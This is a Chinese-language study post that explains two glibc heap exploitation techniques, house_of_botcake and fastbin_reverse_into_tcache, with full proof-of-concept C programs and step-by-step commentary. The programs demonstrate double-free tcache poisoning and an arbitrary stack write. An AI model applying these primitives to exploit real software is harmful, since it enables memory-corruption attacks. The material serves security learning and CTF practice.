house_of_botcake && fastbin_reverse_into_tcache

house_of_botcake 是针对2.29对double free做出限制以后提出的利用方法

fastbin_reverse_into_tcache 是利用fastbin实现一个类似于unsorted bin attack的效果

0x01 house_of_botcake

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>


int main()
{
    /*
     * This attack should bypass the restriction introduced in
     * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d
     * If the libc does not include the restriction, you can simply double free the victim and do a
     * simple tcache poisoning
     * And thanks to @anton00b and @subwire for the weird name of this technique */

    // disable buffering so _IO_FILE does not interfere with our heap
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    // introduction
    puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into");
    puts("returning a pointer to an arbitrary location (in this demo, the stack).");
    puts("This attack only relies on double free.\n");

    // prepare the target
    intptr_t stack_var[4];
    puts("The address we want malloc() to return, namely,");
    printf("the target address is %p.\n\n", stack_var);

    // prepare heap layout
    puts("Preparing heap layout");
    puts("Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later.");
    intptr_t *x[7];
    for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
        x[i] = malloc(0x100);
    }
    puts("Allocating a chunk for later consolidation");
    intptr_t *prev = malloc(0x100);
    puts("Allocating the victim chunk.");
    intptr_t *a = malloc(0x100);
    printf("malloc(0x100): a=%p.\n", a); 
    puts("Allocating a padding to prevent consolidation.\n");
    malloc(0x10);
    
    // cause chunk overlapping
    puts("Now we are able to cause chunk overlapping");
    puts("Step 1: fill up tcache list");
    for(int i=0; i<7; i++){
        free(x[i]);
    }
    puts("Step 2: free the victim chunk so it will be added to unsorted bin");
    free(a);
    
    puts("Step 3: free the previous chunk and make it consolidate with the victim chunk.");
    free(prev);
    
    puts("Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n");
    malloc(0x100);
    /*VULNERABILITY*/
    free(a);// a is already freed
    /*VULNERABILITY*/
    
    // simple tcache poisoning
    puts("Launch tcache poisoning");
    puts("Now the victim is contained in a larger freed chunk, we can do a simple tcache poisoning by using overlapped chunk");
    intptr_t *b = malloc(0x120);
    puts("We simply overwrite victim's fwd pointer");
    b[0x120/8-2] = (long)stack_var;
    
    // take target out
    puts("Now we can cash out the target chunk.");
    malloc(0x100);
    intptr_t *c = malloc(0x100);
    printf("The new chunk is at %p\n", c);
    
    // sanity check
    assert(c==stack_var);
    printf("Got control on target/stack!\n\n");
    
    // note
    puts("Note:");
    puts("And the wonderful thing about this exploitation is that: you can free b, victim again and modify the fwd pointer of victim");
    puts("In that case, once you have done this exploitation, you can have many arbitary writes very easily.");

    return 0;
}

先申请7个chunk，然后再申请出一个a和一个prev，我们最后会对这个a进行攻击。（注意先申请prev，再申请a，顺序不能乱）

for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
       x[i] = malloc(0x100);
   }
   puts("Allocating a chunk for later consolidation");
   intptr_t *prev = malloc(0x100);
   puts("Allocating the victim chunk.");
   intptr_t *a = malloc(0x100);

随后把tcache填满，释放a和prev,释放a和prev，这个时候a和prev合并了，都在unsortedbin中

for(int i=0; i<7; i++){
       free(x[i]);
   }
   puts("Step 2: free the victim chunk so it will be added to unsorted bin");
   free(a);
   
   puts("Step 3: free the previous chunk and make it consolidate with the victim chunk.");
   free(prev);

然后实现double free,此时没有相同指针在bin和tcache中

puts("Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n");
   malloc(0x100);
   /*VULNERABILITY*/
   free(a);// a is already freed
   /*VULNERABILITY*/

最后更改fd，完美

intptr_t *b = malloc(0x120);
  puts("We simply overwrite victim's fwd pointer");
  b[0x120/8-2] = (long)stack_var;
  
  // take target out
  puts("Now we can cash out the target chunk.");
  malloc(0x100);
  intptr_t *c = malloc(0x100);
  printf("The new chunk is at %p\n", c);

0x02 fastbin_reverse_into_tcache

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

const size_t allocsize = 0x40;

int main(){
  fprintf(
    stderr,
    "\n"
    "This attack is intended to have a similar effect to the unsorted_bin_attack,\n"
    "except it works with a small allocation size (allocsize <= 0x78).\n"
    "The goal is to set things up so that a call to malloc(allocsize) will write\n"
    "a large unsigned value to the stack.\n\n"
  );

  // Allocate 14 times so that we can free later.
  char* ptrs[14];
  size_t i;
  for (i = 0; i < 14; i++) {
    ptrs[i] = malloc(allocsize);
  }

  fprintf(
    stderr,
    "First we need to free(allocsize) at least 7 times to fill the tcache.\n"
    "(More than 7 times works fine too.)\n\n"
  );

  // Fill the tcache.
  for (i = 0; i < 7; i++) {
    free(ptrs[i]);
  }

  char* p = ptrs[7];
  fprintf(
    stderr,
    "The next pointer that we free is the chunk that we're going to corrupt: %p\n"
    "It doesn't matter if we corrupt it now or later. Because the tcache is\n"
    "already full, it will go in the fastbin.\n\n",
    p
  );
  free(p);

  fprintf(
    stderr,
    "Next we need to free between 1 and 6 more pointers. These will also go\n"
    "in the fastbin. If the stack address that we want to overwrite is not zero\n"
    "then we need to free exactly 6 more pointers, otherwise the attack will\n"
    "cause a segmentation fault. But if the value on the stack is zero then\n"
    "a single free is sufficient.\n\n"
  );

  // Fill the fastbin.
  for (i = 8; i < 14; i++) {
    free(ptrs[i]);
  }

  // Create an array on the stack and initialize it with garbage.
  size_t stack_var[6];
  memset(stack_var, 0xcd, sizeof(stack_var));

  fprintf(
    stderr,
    "The stack address that we intend to target: %p\n"
    "It's current value is %p\n",
    &stack_var[2],
    (char*)stack_var[2]
  );

  fprintf(
    stderr,
    "Now we use a vulnerability such as a buffer overflow or a use-after-free\n"
    "to overwrite the next pointer at address %p\n\n",
    p
  );

  //------------VULNERABILITY-----------

  // Overwrite linked list pointer in p.
  *(size_t**)p = &stack_var[0];

  //------------------------------------

  fprintf(
    stderr,
    "The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n"
  );

  // Empty tcache.
  for (i = 0; i < 7; i++) {
    ptrs[i] = malloc(allocsize);
  }

  fprintf(
    stderr,
    "Let's just print the contents of our array on the stack now,\n"
    "to show that it hasn't been modified yet.\n\n"
  );

  for (i = 0; i < 6; i++) {
    fprintf(stderr, "%p: %p\n", &stack_var[i], (char*)stack_var[i]);
  }

  fprintf(
    stderr,
    "\n"
    "The next allocation triggers the stack to be overwritten. The tcache\n"
    "is empty, but the fastbin isn't, so the next allocation comes from the\n"
    "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n"
    "Those 7 chunks are copied in reverse order into the tcache, so the stack\n"
    "address that we are targeting ends up being the first chunk in the tcache.\n"
    "It contains a pointer to the next chunk in the list, which is why a heap\n"
    "pointer is written to the stack.\n"
    "\n"
    "Earlier we said that the attack will also work if we free fewer than 6\n"
    "extra pointers to the fastbin, but only if the value on the stack is zero.\n"
    "That's because the value on the stack is treated as a next pointer in the\n"
    "linked list and it will trigger a crash if it isn't a valid pointer or null.\n"
    "\n"
    "The contents of our array on the stack now look like this:\n\n"
  );

  malloc(allocsize);

  for (i = 0; i < 6; i++) {
    fprintf(stderr, "%p: %p\n", &stack_var[i], (char*)stack_var[i]);
  }

  char *q = malloc(allocsize);
  fprintf(
    stderr,
    "\n"
    "Finally, if we malloc one more time then we get the stack address back: %p\n",
    q
  );

  return 0;
}

这个给的代码例子看起来貌似很复杂，但实际上是挺简单的过程，概括起来就是

先把tcache填满，然后再给fastbin填6个

char* ptrs[14];
  size_t i;
  for (i = 0; i < 14; i++) {
    ptrs[i] = malloc(allocsize);
  }

  fprintf(
    stderr,
    "First we need to free(allocsize) at least 7 times to fill the tcache.\n"
    "(More than 7 times works fine too.)\n\n"
  );

  // Fill the tcache.
  for (i = 0; i < 7; i++) {
    free(ptrs[i]);
  }

  char* p = ptrs[7];
  fprintf(
    stderr,
    "The next pointer that we free is the chunk that we're going to corrupt: %p\n"
    "It doesn't matter if we corrupt it now or later. Because the tcache is\n"
    "already full, it will go in the fastbin.\n\n",
    p
  );
  free(p);

  fprintf(
    stderr,
    "Next we need to free between 1 and 6 more pointers. These will also go\n"
    "in the fastbin. If the stack address that we want to overwrite is not zero\n"
    "then we need to free exactly 6 more pointers, otherwise the attack will\n"
    "cause a segmentation fault. But if the value on the stack is zero then\n"
    "a single free is sufficient.\n\n"
  );

  // Fill the fastbin.
  for (i = 8; i < 14; i++) {
    free(ptrs[i]);
  }

然后再修改fastbin尾部那个chunk的fd,把tcache清空。当从fastbin中取出chunk的时候，会把其它的fastbin中的chunk反向插入到tcache中，这样就可以实现把目的地址的fd写上一个堆地址。

//------------VULNERABILITY-----------

 // Overwrite linked list pointer in p.
 *(size_t**)p = &stack_var[0];

 //------------------------------------

 fprintf(
   stderr,
   "The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n"
 );

 // Empty tcache.
 for (i = 0; i < 7; i++) {
   ptrs[i] = malloc(allocsize);
 }

 fprintf(
   stderr,
   "Let's just print the contents of our array on the stack now,\n"
   "to show that it hasn't been modified yet.\n\n"
 );

 for (i = 0; i < 6; i++) {
   fprintf(stderr, "%p: %p\n", &stack_var[i], (char*)stack_var[i]);
 }

 fprintf(
   stderr,
   "\n"
   "The next allocation triggers the stack to be overwritten. The tcache\n"
   "is empty, but the fastbin isn't, so the next allocation comes from the\n"
   "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n"
   "Those 7 chunks are copied in reverse order into the tcache, so the stack\n"
   "address that we are targeting ends up being the first chunk in the tcache.\n"
   "It contains a pointer to the next chunk in the list, which is why a heap\n"
   "pointer is written to the stack.\n"
   "\n"
   "Earlier we said that the attack will also work if we free fewer than 6\n"
   "extra pointers to the fastbin, but only if the value on the stack is zero.\n"
   "That's because the value on the stack is treated as a next pointer in the\n"
   "linked list and it will trigger a crash if it isn't a valid pointer or null.\n"
   "\n"
   "The contents of our array on the stack now look like this:\n\n"
 );

 malloc(allocsize);

 for (i = 0; i < 6; i++) {
   fprintf(stderr, "%p: %p\n", &stack_var[i], (char*)stack_var[i]);
 }

 char *q = malloc(allocsize);
 fprintf(
   stderr,
   "\n"
   "Finally, if we malloc one more time then we get the stack address back: %p\n",
   q
 );